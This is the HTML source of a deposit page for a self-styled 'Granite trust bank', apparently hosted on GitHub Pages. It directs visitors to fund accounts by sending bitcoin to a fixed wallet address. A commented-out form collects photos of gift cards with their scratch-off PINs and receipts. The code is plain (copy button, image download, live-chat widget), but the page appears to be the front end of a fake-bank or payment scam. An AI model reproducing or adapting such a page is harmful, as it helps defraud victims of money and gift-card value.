<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Granite trust bank</title>
    <!-- tailwind -->
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
    <link rel="stylesheet" href="../styles.css">
    <link rel="stylesheet" href="../login.css">
    <link rel="stylesheet" href="../dashboard/dashboard.css">
    <script src="https://kit.fontawesome.com/a17111d927.js" crossorigin="anonymous"></script>
    <!-- font  -->
    <link href="https://fonts.googleapis.com/css2?family=Lora:ital,wght@1,400;1,500&family=Maven+Pro:wght@400;500;600&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0" />

    <link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css">
    <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script>


    <style>
      .mainDiv {
        padding: 5%;
      }
      .fund h4 {
        font-weight: bolder;
        font-size: 30px;
      }
      .fund p {
        margin: 20px 0;
      }
      .container {
          display: flex;
          align-items: center;
          gap: 10px;
          margin: 50px 0 ;
      }
      .container p {
        background-color: #E1F6EA;
        padding: 10px;
        font-size: 12px;
      }
      .copy-button {
          padding: 10px 20px;
          font-size: 16px;
          border: none;
          background-color: #00B776;
          color: white;
          cursor: pointer;
          border-radius: 4px;
      }
      .copy-button:hover {
          background-color: #0056b3;
      }


      .contain {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 10px;
            margin: 50px;
        }
        .download-button {
            padding: 10px 20px;
            font-size: 16px;
            border: none;
            /* background-color: #007BFF; */
            color: gray;
            cursor: pointer;
            border-radius: 4px;

            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1), 
                        0 6px 20px rgba(0, 0, 0, 0.1);
        }
        .download-button:hover {
            background-color: #00B776;
        }

        .imgsDiv {
          display: flex;
          justify-content: center;
          align-items: center;
          width: 100%;
        }
        .imgsDiv img {
          width: 100px;
          height: 100px;
        }


        /* upload card */
        .parentContainerImg {
          background-color: ;
          border-radius: 15px;
          margin-bottom: 20px;
          
        }
        .containerImg {
            display: flex;
            /* flex-direction: column; */
            gap: 15px;
            padding: 20px;
            
        }
        .file-input {
            position: relative;
            width: 100%;
        }
        .file-input input[type="file"] {
            display: none;
        }
        .file-input label {
            display: block;
            padding: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1), 
                        0 6px 20px rgba(0, 0, 0, 0.1);
            border-radius: 8px;
            color: #00B776;
            text-align: center;
            border-radius: 4px;
            cursor: pointer;
            /* background-color: #E1F6EA; */
        }
        .file-input label:hover {
            background-color: #E1F6EA;
        }
    </style>
    
</head>
<body>
  
  <div class="mainDiv">
    <div class="fund">
      <h4>Fund your account</h4>
      <p>Use the QR Image or copy the BTC wallet address below</p>
      <div class="contain">
        <img id="imageToDownload" src="../img/bybit.jpeg" alt="">
        <button class="download-button" onclick="downloadImage()">Download Image</button>
      </div>
      <div class="container">
        <p id="textToCopy">1DuJ1iJMLJSusQwBd4XurXXMqPEfXF6mBv</p>
        <button class="copy-button" onclick="copyText()">Copy</button>
      </div>
      <!-- <p>Deposit only bitcoin (BTC) to this address</p> -->
      <a href="https://granite-finance.github.io/granite/dashboard/dashboard.html" style="background-color: #00B776; color: white; padding: 15px;">Go back to Dashboard</a>
    </div>


    
    <!-- <h4 style="font-size: 30px; font-weight: bolder; margin-top: 60px; color: gray;">You can also fund using Different Gift cards</h4>
    <p style="margin: 10px;">Upload front and back of the pictures, show clearly the scratch off pin</p>


    <div class="parentContainerImg">
      <div class="containerImg">
        <div class="file-input">
            <label for="file1">Upload front of the card</label>
            <input type="file" id="file1" accept="image/*">
        </div>
        <div class="file-input">
            <label for="file2">Upload back of the card</label>
            <input type="file" id="file2" accept="image/*">
        </div>
        <div class="file-input">
            <label for="file3">Upload the receipt of the card</label>
            <input type="file" id="file3" accept="image/*">
        </div>
      </div>
      <div style="display: flex; justify-content: center; align-items: center; padding: 5% 0;">
        <button style="background-color: #00B776; padding: 10px 5%; color: white;">SUBMIT</button>
      </div>
    </div>

    <div class="imgsDiv">
      <img src="../img/amason.webp" alt="">
      <img src="../img/google-play.jpg" alt="">
      <img src="../img/ebay.jpg" alt="">
      <img src="../img/itune.jpg" alt="">
    </div>
  </div> -->





  

  

      

<script src="https://granite-finance.github.io/granite/index.js"></script>
<script>
  function copyText() {
      // Get the text from the <p> element
      var text = document.getElementById('textToCopy').innerText;
      
      // Create a temporary input element
      var tempInput = document.createElement('input');
      tempInput.type = 'text';
      tempInput.value = text;
      document.body.appendChild(tempInput);

      // Select the text field
      tempInput.select();
      tempInput.setSelectionRange(0, 99999); // For mobile devices

      // Copy the text inside the text field
      document.execCommand('copy');

      // Remove the temporary input element
      document.body.removeChild(tempInput);

      // Alert the copied text (optional)
      alert("Copied the text: " + text);
  }
</script>

<!-- download the QR code -->
<script>
  function downloadImage() {
      // Get the image element
      var img = document.getElementById('imageToDownload');
      
      // Create a temporary anchor element
      var a = document.createElement('a');
      a.href = img.src; // Set the href to the image source
      a.download = 'downloaded-image.png'; // Set the download attribute with a default file name

      // Append the anchor to the body
      document.body.appendChild(a);

      // Programmatically click the anchor to trigger the download
      a.click();

      // Remove the anchor from the document
      document.body.removeChild(a);
  }
</script>
<!-- tawk api live chat -->
  <!--Start of Tawk.to Script-->
  <script type="text/javascript">
    var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
    (function(){
    var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
    s1.async=true;
    s1.src='https://embed.tawk.to/665ad352981b6c5647771fc0/1hv9civbu';
    s1.charset='UTF-8';
    s1.setAttribute('crossorigin','*');
    s0.parentNode.insertBefore(s1,s0);
    })();
  </script>
  <!--End of Tawk.to Script-->
    

    
</body>
</html>
